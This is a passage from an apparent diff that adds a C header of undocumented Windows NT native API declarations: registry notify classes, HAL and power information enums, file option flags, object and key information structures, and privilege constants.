RegNtPostEnumerateValueKey, + RegNtPostQueryKey, + RegNtPostQueryValueKey, + RegNtPostQueryMultipleValueKey, + RegNtPostKeyHandleClose, + RegNtPreCreateKeyEx, + RegNtPostCreateKeyEx, + RegNtPreOpenKeyEx, + RegNtPostOpenKeyEx, + RegNtPreFlushKey, + RegNtPostFlushKey, + RegNtPreLoadKey, + RegNtPostLoadKey, + RegNtPreUnLoadKey, + RegNtPostUnLoadKey, + RegNtPreQueryKeySecurity, + RegNtPostQueryKeySecurity, + RegNtPreSetKeySecurity, + RegNtPostSetKeySecurity, + RegNtCallbackObjectContextCleanup, + MaxRegNtNotifyClass +} REG_NOTIFY_CLASS, *PREG_NOTIFY_CLASS; + +typedef enum _HAL_QUERY_INFORMATION_CLASS +{ + HalInstalledBusInformation, + HalProfileSourceInformation, + HalInformationClassUnused1, + HalPowerInformation, + HalProcessorSpeedInformation, + HalCallbackInformation, + HalMapRegisterInformation, + HalMcaLogInformation, + HalFrameBufferCachingInformation, + HalDisplayBiosInformation, + HalProcessorFeatureInformation, + HalNumaTopologyInterface, + HalErrorInformation, + HalCmcLogInformation, + HalCpeLogInformation, + HalQueryMcaInterface, + HalQueryAMLIIllegalIOPortAddresses, + HalQueryMaxHotPlugMemoryAddress, + HalPartitionIpiInterface, + HalPlatformInformation, + HalQueryProfileSourceList, + HalInitLogInformation, + HalFrequencyInformation, + HalProcessorBrandString +} HAL_QUERY_INFORMATION_CLASS, *PHAL_QUERY_INFORMATION_CLASS; + + +#if defined(_WINNT_) && (_MSC_VER < 1300) && !defined(_WINDOWS_) +typedef enum POWER_INFORMATION_LEVEL { + SystemPowerPolicyAc = 0x0, + SystemPowerPolicyDc = 0x1, + VerifySystemPolicyAc = 0x2, + VerifySystemPolicyDc = 0x3, + SystemPowerCapabilities = 0x4, + SystemBatteryState = 0x5, + SystemPowerStateHandler = 0x6, + ProcessorStateHandler = 0x7, + SystemPowerPolicyCurrent = 0x8, + AdministratorPowerPolicy = 0x9, + SystemReserveHiberFile = 0xa, + ProcessorInformation = 0xb, + SystemPowerInformation = 0xc, + ProcessorStateHandler2 = 0xd, + LastWakeTime = 0xe, + LastSleepTime = 0xf, + SystemExecutionState = 0x10, + SystemPowerStateNotifyHandler = 0x11, + ProcessorPowerPolicyAc = 0x12, + ProcessorPowerPolicyDc = 0x13, + VerifyProcessorPowerPolicyAc = 0x14, + VerifyProcessorPowerPolicyDc = 0x15, + ProcessorPowerPolicyCurrent = 0x16, + SystemPowerStateLogging = 0x17, + SystemPowerLoggingEntry = 0x18, + SetPowerSettingValue = 0x19, + NotifyUserPowerSetting = 0x1a, + GetPowerTransitionVetoes = 0x1b, + SetPowerTransitionVeto = 0x1c, + SystemVideoState = 0x1d, + TraceApplicationPowerMessage = 0x1e, + TraceApplicationPowerMessageEnd = 0x1f, + ProcessorPerfStates = 0x20, + ProcessorIdleStates = 0x21, + ProcessorThrottleStates = 0x22, + SystemWakeSource = 0x23, + SystemHiberFileInformation = 0x24, + TraceServicePowerMessage = 0x25, + ProcessorLoad = 0x26, + PowerShutdownNotification = 0x27, + MonitorCapabilities = 0x28 +}; +#endif + +typedef struct _IO_STATUS_BLOCK { + union { + NTSTATUS Status; + PVOID Pointer; + }; + ULONG_PTR Information; +} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; + +typedef VOID(NTAPI *PIO_APC_ROUTINE)( + IN PVOID ApcContext, + IN PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG Reserved + ); + +typedef struct _X86_FLOATING_SAVE_AREA +{ + ULONG ControlWord; + ULONG StatusWord; + ULONG TagWord; + ULONG ErrorOffset; + ULONG ErrorSelector; + ULONG DataOffset; + ULONG DataSelector; + UCHAR RegisterArea[ 80 ]; + ULONG Cr0NpxState; +} X86_FLOATING_SAVE_AREA, *PX86_FLOATING_SAVE_AREA; + +typedef struct _X86_CONTEXT +{ + ULONG ContextFlags; + ULONG Dr0; + ULONG Dr1; + ULONG Dr2; + ULONG Dr3; + ULONG Dr6; + ULONG Dr7; + X86_FLOATING_SAVE_AREA FloatSave; + ULONG SegGs; + ULONG SegFs; + ULONG SegEs; + ULONG SegDs; + ULONG Edi; + ULONG Esi; + ULONG Ebx; + ULONG Edx; + ULONG Ecx; + ULONG Eax; + ULONG Ebp; + ULONG Eip; + ULONG SegCs; + ULONG EFlags; + ULONG Esp; + ULONG SegSs; +} X86_CONTEXT, *PX86_CONTEXT; + +#define FILE_SUPERSEDE 0x00000000 +#define FILE_OPEN 0x00000001 +#define FILE_CREATE 0x00000002 +#define FILE_OPEN_IF 0x00000003 +#define FILE_OVERWRITE 0x00000004 +#define FILE_OVERWRITE_IF 0x00000005 +#define FILE_MAXIMUM_DISPOSITION 0x00000005 + +#define FILE_DIRECTORY_FILE 0x00000001 +#define FILE_WRITE_THROUGH 0x00000002 +#define FILE_SEQUENTIAL_ONLY 0x00000004 +#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 + +#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 +#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 +#define FILE_NON_DIRECTORY_FILE 0x00000040 +#define FILE_CREATE_TREE_CONNECTION 0x00000080 + +#define FILE_COMPLETE_IF_OPLOCKED 0x00000100 +#define FILE_NO_EA_KNOWLEDGE 0x00000200 +#define FILE_OPEN_FOR_RECOVERY 0x00000400 +#define FILE_RANDOM_ACCESS 0x00000800 + +#define FILE_DELETE_ON_CLOSE 0x00001000 +#define FILE_OPEN_BY_FILE_ID 0x00002000 +#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 +#define FILE_NO_COMPRESSION 0x00008000 + +#define FILE_RESERVE_OPFILTER 0x00100000 +#define FILE_OPEN_REPARSE_POINT 0x00200000 +#define FILE_OPEN_NO_RECALL 0x00400000 +#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 + + +#define FILE_COPY_STRUCTURED_STORAGE 0x00000041 +#define FILE_STRUCTURED_STORAGE 0x00000441 + +#define FILE_VALID_OPTION_FLAGS 0x00ffffff +#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032 +#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032 +#define FILE_VALID_SET_FLAGS 0x00000036 + +#define WIN32_CLIENT_INFO_LENGTH 62 + +#define PIO_APC_ROUTINE_DEFINED + +typedef struct _PORT_VIEW { + ULONG Length; + LPC_HANDLE SectionHandle; + ULONG SectionOffset; + LPC_SIZE_T ViewSize; + LPC_PVOID ViewBase; + LPC_PVOID ViewRemoteBase; +} PORT_VIEW, *PPORT_VIEW; + +typedef struct _REMOTE_PORT_VIEW { + ULONG Length; + LPC_SIZE_T ViewSize; + LPC_PVOID ViewBase; +} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; + +#define IO_COMPLETION_QUERY_STATE 0x0001 +#define IO_COMPLETION_MODIFY_STATE 0x0002 +#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) + +typedef enum _IO_COMPLETION_INFORMATION_CLASS { + IoCompletionBasicInformation +} IO_COMPLETION_INFORMATION_CLASS; + +typedef enum _PORT_INFORMATION_CLASS { + PortBasicInformation +} PORT_INFORMATION_CLASS; + +typedef enum _SECTION_INHERIT { + ViewShare = 1, + ViewUnmap = 2 +} SECTION_INHERIT; + +//added 21/03/2011 +typedef struct _MEMORY_WORKING_SET_BLOCK +{ + ULONG_PTR Protection : 5; + ULONG_PTR ShareCount : 3; + ULONG_PTR Shared : 1; + ULONG_PTR Node : 3; +#if defined(_M_X64) + ULONG_PTR VirtualPage : 52; +#else + ULONG VirtualPage : 20; +#endif +} MEMORY_WORKING_SET_BLOCK, *PMEMORY_WORKING_SET_BLOCK; + +typedef struct _MEMORY_WORKING_SET_INFORMATION +{ + ULONG_PTR NumberOfEntries; + MEMORY_WORKING_SET_BLOCK WorkingSetInfo[1]; +} MEMORY_WORKING_SET_INFORMATION, *PMEMORY_WORKING_SET_INFORMATION; + +typedef struct _MEMORY_WORKING_SET_EX_BLOCK +{ + ULONG_PTR Valid : 1; + ULONG_PTR ShareCount : 3; + ULONG_PTR Win32Protection : 11; + ULONG_PTR Shared : 1; + ULONG_PTR Node : 6; + ULONG_PTR Locked : 1; + ULONG_PTR LargePage : 1; + ULONG_PTR Priority : 3; + ULONG_PTR Reserved : 5; + +#if defined(_M_X64) + ULONG_PTR ReservedUlong : 32; +#endif +} MEMORY_WORKING_SET_EX_BLOCK, *PMEMORY_WORKING_SET_EX_BLOCK; + +typedef struct _MEMORY_REGION_INFORMATION +{ + PVOID AllocationBase; + ULONG AllocationProtect; + ULONG RegionType; + SIZE_T RegionSize; +} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION; + +typedef struct _MEMORY_WORKING_SET_EX_INFORMATION +{ + PVOID VirtualAddress; + union + { + MEMORY_WORKING_SET_EX_BLOCK VirtualAttributes; + ULONG Long; + }; +} MEMORY_WORKING_SET_EX_INFORMATION, *PMEMORY_WORKING_SET_EX_INFORMATION; + +typedef +VOID +(*PTIMER_APC_ROUTINE) ( + IN PVOID TimerContext, + IN ULONG TimerLowValue, + IN LONG TimerHighValue + ); + +typedef enum _SHUTDOWN_ACTION { + ShutdownNoReboot, + ShutdownReboot, + ShutdownPowerOff +} SHUTDOWN_ACTION; + +typedef enum _ATOM_INFORMATION_CLASS +{ + AtomBasicInformation, + AtomTableInformation +} ATOM_INFORMATION_CLASS; + +typedef struct _ATOM_BASIC_INFORMATION +{ + USHORT UsageCount; + USHORT Flags; + USHORT NameLength; + WCHAR Name[1]; +} ATOM_BASIC_INFORMATION, *PATOM_BASIC_INFORMATION; + +typedef struct _ATOM_TABLE_INFORMATION +{ + ULONG NumberOfAtoms; + RTL_ATOM Atoms[1]; +} ATOM_TABLE_INFORMATION, *PATOM_TABLE_INFORMATION; + +#define SEMAPHORE_QUERY_STATE 0x0001 +#define SEMAPHORE_MODIFY_STATE 0x0002 + +#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) + +typedef enum _SEMAPHORE_INFORMATION_CLASS { + SemaphoreBasicInformation +} SEMAPHORE_INFORMATION_CLASS; + +typedef struct _SEMAPHORE_BASIC_INFORMATION { + LONG CurrentCount; + LONG MaximumCount; +} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION; + +#define MUTANT_QUERY_STATE 0x0001 + +#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|\ + MUTANT_QUERY_STATE) + +typedef enum _MUTANT_INFORMATION_CLASS { + MutantBasicInformation +} MUTANT_INFORMATION_CLASS; + +typedef struct _MUTANT_BASIC_INFORMATION { + LONG CurrentCount; + BOOLEAN OwnedByCaller; + BOOLEAN AbandonedState; +} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION; + +#define TIMER_QUERY_STATE 0x0001 +#define TIMER_MODIFY_STATE 0x0002 + +#define TIMER_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|\ + TIMER_QUERY_STATE|TIMER_MODIFY_STATE) +typedef enum _TIMER_INFORMATION_CLASS { + TimerBasicInformation +} TIMER_INFORMATION_CLASS; + +typedef struct _TIMER_BASIC_INFORMATION { + LARGE_INTEGER RemainingTime; + BOOLEAN TimerState; +} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION; + +typedef enum _SECTION_INFORMATION_CLASS { + SectionBasicInformation, + SectionImageInformation, + MaxSectionInfoClass +} SECTION_INFORMATION_CLASS; + +#define OBJ_NAME_PATH_SEPARATOR ((WCHAR)L'\\') +#define OBJ_MAX_REPARSE_ATTEMPTS 32 +#define OBJECT_TYPE_CREATE (0x0001) +#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) + +#define DIRECTORY_QUERY (0x0001) +#define DIRECTORY_TRAVERSE (0x0002) +#define DIRECTORY_CREATE_OBJECT (0x0004) +#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008) + +#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) +#define SYMBOLIC_LINK_QUERY (0x0001) +#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) + +typedef enum _OBJECT_INFORMATION_CLASS { + ObjectBasicInformation, + ObjectNameInformation, + ObjectTypeInformation, + ObjectTypesInformation, + ObjectHandleFlagInformation, + ObjectSessionInformation, + MaxObjectInfoClass +} OBJECT_INFORMATION_CLASS; + +typedef struct _OBJECT_BASIC_INFORMATION { + ULONG Attributes; + ACCESS_MASK GrantedAccess; + ULONG HandleCount; + ULONG PointerCount; + ULONG PagedPoolCharge; + ULONG NonPagedPoolCharge; + ULONG Reserved[ 3 ]; + ULONG NameInfoSize; + ULONG TypeInfoSize; + ULONG SecurityDescriptorSize; + LARGE_INTEGER CreationTime; +} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; + +typedef struct _OBJECT_NAME_INFORMATION { + UNICODE_STRING Name; +} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; + +typedef struct _OBJECT_TYPE_INFORMATION +{ + UNICODE_STRING TypeName; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG TotalPagedPoolUsage; + ULONG TotalNonPagedPoolUsage; + ULONG TotalNamePoolUsage; + ULONG TotalHandleTableUsage; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + ULONG HighWaterPagedPoolUsage; + ULONG HighWaterNonPagedPoolUsage; + ULONG HighWaterNamePoolUsage; + ULONG HighWaterHandleTableUsage; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ULONG ValidAccessMask; + BOOLEAN SecurityRequired; + BOOLEAN MaintainHandleCount; + ULONG PoolType; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; +} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; + +typedef struct _OBJECT_TYPES_INFORMATION +{ + ULONG NumberOfTypes; + OBJECT_TYPE_INFORMATION TypeInformation; +} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION; + +typedef struct _OBJECT_HANDLE_FLAG_INFORMATION +{ + BOOLEAN Inherit; + BOOLEAN ProtectFromClose; +} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; + +typedef enum _PLUGPLAY_EVENT_CATEGORY { + HardwareProfileChangeEvent, + TargetDeviceChangeEvent, + DeviceClassChangeEvent, + CustomDeviceEvent, + DeviceInstallEvent, + DeviceArrivalEvent, + PowerEvent, + VetoEvent, + BlockedDriverEvent, + InvalidIDEvent, + MaxPlugEventCategory +} PLUGPLAY_EVENT_CATEGORY, *PPLUGPLAY_EVENT_CATEGORY; + +typedef enum _PNP_VETO_TYPE { + PNP_VetoTypeUnknown, // Name is unspecified + PNP_VetoLegacyDevice, // Name is an Instance Path + PNP_VetoPendingClose, // Name is an Instance Path + PNP_VetoWindowsApp, // Name is a Module + PNP_VetoWindowsService, // Name is a Service + PNP_VetoOutstandingOpen, // Name is an Instance Path + PNP_VetoDevice, // Name is an Instance Path + PNP_VetoDriver, // Name is a Driver Service Name + PNP_VetoIllegalDeviceRequest, // Name is an Instance Path + PNP_VetoInsufficientPower, // Name is unspecified + PNP_VetoNonDisableable, // Name is an Instance Path + PNP_VetoLegacyDriver, // Name is a Service + PNP_VetoInsufficientRights // Name is unspecified +} PNP_VETO_TYPE, *PPNP_VETO_TYPE; + +typedef struct _PLUGPLAY_EVENT_BLOCK { + // + // Common event data + // + GUID EventGuid; + PLUGPLAY_EVENT_CATEGORY EventCategory; + PULONG Result; + ULONG Flags; + ULONG TotalSize; + PVOID DeviceObject; + + union { + + struct { + GUID ClassGuid; + WCHAR SymbolicLinkName[1]; + } DeviceClass; + + struct { + WCHAR DeviceIds[1]; + } TargetDevice; + + struct { + WCHAR DeviceId[1]; + } InstallDevice; + + struct { + PVOID NotificationStructure; + WCHAR DeviceIds[1]; + } CustomNotification; + + struct { + PVOID Notification; + } ProfileNotification; + + struct { + ULONG NotificationCode; + ULONG NotificationData; + } PowerNotification; + + struct { + PNP_VETO_TYPE VetoType; + WCHAR DeviceIdVetoNameBuffer[1]; // DeviceIdVetoName + } VetoNotification; + + struct { + GUID BlockedDriverGuid; + } BlockedDriverNotification; + + struct { + WCHAR ParentId[1]; + } InvalidIDNotification; + + } u; + +} PLUGPLAY_EVENT_BLOCK, *PPLUGPLAY_EVENT_BLOCK; + +typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; + +#define MDL_HASH_TABLE_SIZE 64 +#define MDL_HASH_MASK (MDL_HASH_TABLE_SIZE-1) +#define MDL_HASH_INDEX(wch) ((RtlUpcaseUnicodeChar((wch)) - (WCHAR)'A') & MDL_HASH_MASK) + +#if !defined(_WINNT_) +#define HEAP_MAKE_TAG_FLAGS( b, o ) ((ULONG)((b) + ((o) << 18))) +#endif +#define RTL_HEAP_MAKE_TAG HEAP_MAKE_TAG_FLAGS + +typedef struct _TIME_FIELDS { + CSHORT Year; // range [1601...] + CSHORT Month; // range [1..12] + CSHORT Day; // range [1..31] + CSHORT Hour; // range [0..23] + CSHORT Minute; // range [0..59] + CSHORT Second; // range [0..59] + CSHORT Milliseconds;// range [0..999] + CSHORT Weekday; // range [0..6] == [Sunday..Saturday] +} TIME_FIELDS; +typedef TIME_FIELDS *PTIME_FIELDS; + +typedef struct _RTL_TIME_ZONE_INFORMATION { + LONG Bias; + WCHAR StandardName[ 32 ]; + TIME_FIELDS StandardStart; + LONG StandardBias; + WCHAR DaylightName[ 32 ]; + TIME_FIELDS DaylightStart; + LONG DaylightBias; +} RTL_TIME_ZONE_INFORMATION, *PRTL_TIME_ZONE_INFORMATION; + +typedef struct _RTL_BITMAP_RUN { + ULONG StartingIndex; + ULONG NumberOfBits; +} RTL_BITMAP_RUN; +typedef RTL_BITMAP_RUN *PRTL_BITMAP_RUN; + +typedef struct _PARSE_MESSAGE_CONTEXT { + ULONG fFlags; + ULONG cwSavColumn; + SIZE_T iwSrc; + SIZE_T iwDst; + SIZE_T iwDstSpace; + va_list lpvArgStart; +} PARSE_MESSAGE_CONTEXT, *PPARSE_MESSAGE_CONTEXT; + +typedef enum _RTL_RXACT_OPERATION { + RtlRXactOperationDelete = 1, // Causes sub-key to be deleted + RtlRXactOperationSetValue, // Sets sub-key value (creates key(s) if necessary) + RtlRXactOperationDelAttribute, + RtlRXactOperationSetAttribute +} RTL_RXACT_OPERATION, *PRTL_RXACT_OPERATION; + +typedef struct _RTL_RXACT_LOG { + ULONG OperationCount; + ULONG LogSize; + ULONG LogSizeInUse; +#if defined(_M_X64) + ULONG Alignment; +#endif +} RTL_RXACT_LOG, *PRTL_RXACT_LOG; + +typedef struct _RTL_RXACT_CONTEXT { + HANDLE RootRegistryKey; + HANDLE RXactKey; + BOOLEAN HandlesValid; + PRTL_RXACT_LOG RXactLog; +} RTL_RXACT_CONTEXT, *PRTL_RXACT_CONTEXT; + +#define MAXIMUM_LEADBYTES 12 + +typedef struct _CPTABLEINFO { + USHORT CodePage; // code page number + USHORT MaximumCharacterSize; // max length (bytes) of a char + USHORT DefaultChar; // default character (MB) + USHORT UniDefaultChar; // default character (Unicode) + USHORT TransDefaultChar; // translation of default char (Unicode) + USHORT TransUniDefaultChar; // translation of Unic default char (MB) + USHORT DBCSCodePage; // Non 0 for DBCS code pages + UCHAR LeadByte[MAXIMUM_LEADBYTES]; // lead byte ranges + PUSHORT MultiByteTable; // pointer to MB translation table + PVOID WideCharTable; // pointer to WC translation table + PUSHORT DBCSRanges; // pointer to DBCS ranges + PUSHORT DBCSOffsets; // pointer to DBCS offsets +} CPTABLEINFO, *PCPTABLEINFO; + +typedef struct _NLSTABLEINFO { + CPTABLEINFO OemTableInfo; + CPTABLEINFO AnsiTableInfo; + PUSHORT UpperCaseTable; // 844 format upcase table + PUSHORT LowerCaseTable; // 844 format lower case table +} NLSTABLEINFO, *PNLSTABLEINFO; + +#define RTL_RANGE_LIST_SHARED_OK 0x00000001 +#define RTL_RANGE_LIST_NULL_CONFLICT_OK 0x00000002 + +typedef struct _RTL_RANGE { + ULONGLONG Start; // Read only + ULONGLONG End; // Read only + PVOID UserData; // Read/Write + PVOID Owner; // Read/Write + UCHAR Attributes; // Read/Write + UCHAR Flags; // Read only +} RTL_RANGE, *PRTL_RANGE; + +typedef + BOOLEAN + (*PRTL_CONFLICT_RANGE_CALLBACK) ( + IN PVOID Context, + IN PRTL_RANGE Range + ); + +typedef enum _EVENT_INFORMATION_CLASS { + EventBasicInformation +} EVENT_INFORMATION_CLASS; + + +typedef enum _PLUGPLAY_CONTROL_CLASS { + PlugPlayControlEnumerateDevice, + PlugPlayControlRegisterNewDevice, + PlugPlayControlDeregisterDevice, + PlugPlayControlInitializeDevice, + PlugPlayControlStartDevice, + PlugPlayControlUnlockDevice, + PlugPlayControlQueryAndRemoveDevice, + PlugPlayControlUserResponse, + PlugPlayControlGenerateLegacyDevice, + PlugPlayControlGetInterfaceDeviceList, + PlugPlayControlProperty, + PlugPlayControlDeviceClassAssociation, + PlugPlayControlGetRelatedDevice, + PlugPlayControlGetInterfaceDeviceAlias, + PlugPlayControlDeviceStatus, + PlugPlayControlGetDeviceDepth, + PlugPlayControlQueryDeviceRelations, + PlugPlayControlTargetDeviceRelation, + PlugPlayControlQueryConflictList, + PlugPlayControlRetrieveDock, + PlugPlayControlResetDevice, + PlugPlayControlHaltDevice, + PlugPlayControlGetBlockedDriverList, + MaxPlugPlayControl +} PLUGPLAY_CONTROL_CLASS, *PPLUGPLAY_CONTROL_CLASS; + +typedef +VOID +(*PPS_APC_ROUTINE) ( + IN OPTIONAL PVOID ApcArgument1, + IN OPTIONAL PVOID ApcArgument2, + IN OPTIONAL PVOID ApcArgument3 + ); + +typedef enum _KEY_INFORMATION_CLASS { + KeyBasicInformation, + KeyNodeInformation, + KeyFullInformation, + KeyNameInformation, + KeyCachedInformation, + KeyFlagsInformation, + MaxKeyInfoClass +} KEY_INFORMATION_CLASS; + +typedef struct _KEY_BASIC_INFORMATION { + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG NameLength; + WCHAR Name[1]; +} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; + +typedef enum _KEY_VALUE_INFORMATION_CLASS { + KeyValueBasicInformation, + KeyValueFullInformation, + KeyValuePartialInformation, + KeyValueFullInformationAlign64, + KeyValuePartialInformationAlign64, + MaxKeyValueInfoClass +} KEY_VALUE_INFORMATION_CLASS; + +// +// Value entry query structures +// 14.09.11 + +typedef struct _KEY_VALUE_BASIC_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG NameLength; + WCHAR Name[1]; // Variable size +} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION; + +typedef struct _KEY_VALUE_FULL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataOffset; + ULONG DataLength; + ULONG NameLength; + WCHAR Name[1]; // Variable size +// Data[1]; // Variable size data not declared +} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; + +typedef struct _KEY_VALUE_PARTIAL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; // Variable size +} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; + +typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 { + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; // Variable size +} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64; + +typedef struct _KEY_VALUE_ENTRY { + PUNICODE_STRING ValueName; + ULONG DataLength; + ULONG DataOffset; + ULONG Type; +} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY; + +// +// end of value info +// + +typedef enum _KEY_SET_INFORMATION_CLASS { + KeyWriteTimeInformation, + KeyUserFlagsInformation, + MaxKeySetInfoClass +} KEY_SET_INFORMATION_CLASS; + +#define SE_CREATE_TOKEN_NAME TEXT("SeCreateTokenPrivilege") +#define SE_ASSIGNPRIMARYTOKEN_NAME TEXT("SeAssignPrimaryTokenPrivilege") +#define SE_LOCK_MEMORY_NAME TEXT("SeLockMemoryPrivilege") +#define SE_INCREASE_QUOTA_NAME TEXT("SeIncreaseQuotaPrivilege") +#define SE_UNSOLICITED_INPUT_NAME TEXT("SeUnsolicitedInputPrivilege") +#define SE_MACHINE_ACCOUNT_NAME TEXT("SeMachineAccountPrivilege") +#define SE_TCB_NAME TEXT("SeTcbPrivilege") +#define SE_SECURITY_NAME TEXT("SeSecurityPrivilege") +#define SE_TAKE_OWNERSHIP_NAME TEXT("SeTakeOwnershipPrivilege") +#define SE_LOAD_DRIVER_NAME TEXT("SeLoadDriverPrivilege") +#define SE_SYSTEM_PROFILE_NAME TEXT("SeSystemProfilePrivilege") +#define SE_SYSTEMTIME_NAME TEXT("SeSystemtimePrivilege") +#define SE_PROF_SINGLE_PROCESS_NAME TEXT("SeProfileSingleProcessPrivilege") +#define SE_INC_BASE_PRIORITY_NAME TEXT("SeIncreaseBasePriorityPrivilege") +#define SE_CREATE_PAGEFILE_NAME TEXT("SeCreatePagefilePrivilege") +#define SE_CREATE_PERMANENT_NAME TEXT("SeCreatePermanentPrivilege") +#define SE_BACKUP_NAME TEXT("SeBackupPrivilege") +#define SE_RESTORE_NAME TEXT("SeRestorePrivilege") +#define SE_SHUTDOWN_NAME TEXT("SeShutdownPrivilege") +#define SE_DEBUG_NAME TEXT("SeDebugPrivilege") +#define SE_AUDIT_NAME TEXT("SeAuditPrivilege") +#define SE_SYSTEM_ENVIRONMENT_NAME TEXT("SeSystemEnvironmentPrivilege") +#define SE_CHANGE_NOTIFY_NAME TEXT("SeChangeNotifyPrivilege") +#define SE_REMOTE_SHUTDOWN_NAME TEXT("SeRemoteShutdownPrivilege") +#define SE_UNDOCK_NAME TEXT("SeUndockPrivilege") +#define SE_SYNC_AGENT_NAME TEXT("SeSyncAgentPrivilege") +#define SE_ENABLE_DELEGATION_NAME TEXT("SeEnableDelegationPrivilege") +#define SE_MANAGE_VOLUME_NAME TEXT("SeManageVolumePrivilege") +#define SE_IMPERSONATE_NAME TEXT("SeImpersonatePrivilege") +// #define SE_CREATE_GLOBAL_PRIVILEGE TEXT("SeCreateGlobalPrivilege") +// #define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE TEXT("SeTrustedCredmanAccessPrivilege") +// #define SE_RELABEL_PRIVILEGE TEXT("SeReLabelPrivilege") +#define SE_CREATE_GLOBAL_NAME TEXT("SeCreateGlobalPrivilege") + +// Privileges + +#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L) +#define SE_CREATE_TOKEN_PRIVILEGE (2L) +#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L) +#define SE_LOCK_MEMORY_PRIVILEGE (4L) +#define SE_INCREASE_QUOTA_PRIVILEGE (5L) + +#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L) +#define SE_TCB_PRIVILEGE (7L) +#define SE_SECURITY_PRIVILEGE (8L) +#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L) +#define SE_LOAD_DRIVER_PRIVILEGE (10L) +#define SE_SYSTEM_PROFILE_PRIVILEGE (11L) +#define SE_SYSTEMTIME_PRIVILEGE (12L) +#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L) +#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L) +#define SE_CREATE_PAGEFILE_PRIVILEGE (15L) +#define SE_CREATE_PERMANENT_PRIVILEGE (16L) +#define SE_BACKUP_PRIVILEGE (17L) +#define SE_RESTORE_PRIVILEGE (18L) +#define SE_SHUTDOWN_PRIVILEGE (19L) +#define SE_DEBUG_PRIVILEGE (20L) +#define SE_AUDIT_PRIVILEGE (21L) +#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L) +#define SE_CHANGE_NOTIFY_PRIVILEGE (23L) +#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L) +#define SE_UNDOCK_PRIVILEGE (25L) +#define SE_SYNC_AGENT_PRIVILEGE (26L) +#define SE_ENABLE_DELEGATION_PRIVILEGE (27L) +#define SE_MANAGE_VOLUME_PRIVILEGE (28L) +#define SE_IMPERSONATE_PRIVILEGE (29L) +#define SE_CREATE_GLOBAL_PRIVILEGE (30L) +#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L) +#define SE_RELABEL_PRIVILEGE (32L) +#define SE_INC_WORKING_SET_PRIVILEGE (33L) +#define SE_TIME_ZONE_PRIVILEGE (34L) +#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L) +#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE + +typedef struct _CLIENT_ID +{ + HANDLE UniqueProcess; + HANDLE UniqueThread; +} CLIENT_ID, *PCLIENT_ID; + +typedef struct _CLIENT_ID32 +{ + ULONG UniqueProcess; + ULONG UniqueThread; +} CLIENT_ID32, *PCLIENT_ID32; + +typedef struct _CLIENT_ID64 +{ + ULONGLONG UniqueProcess; + ULONGLONG UniqueThread; +} CLIENT_ID64, *PCLIENT_ID64; + +#include + +typedef struct _KSYSTEM_TIME +{ + ULONG LowPart; + LONG High1Time; + LONG High2Time; +} KSYSTEM_TIME, *PKSYSTEM_TIME; + +#include + +// +// FILE_INFORMATION +// +//readded 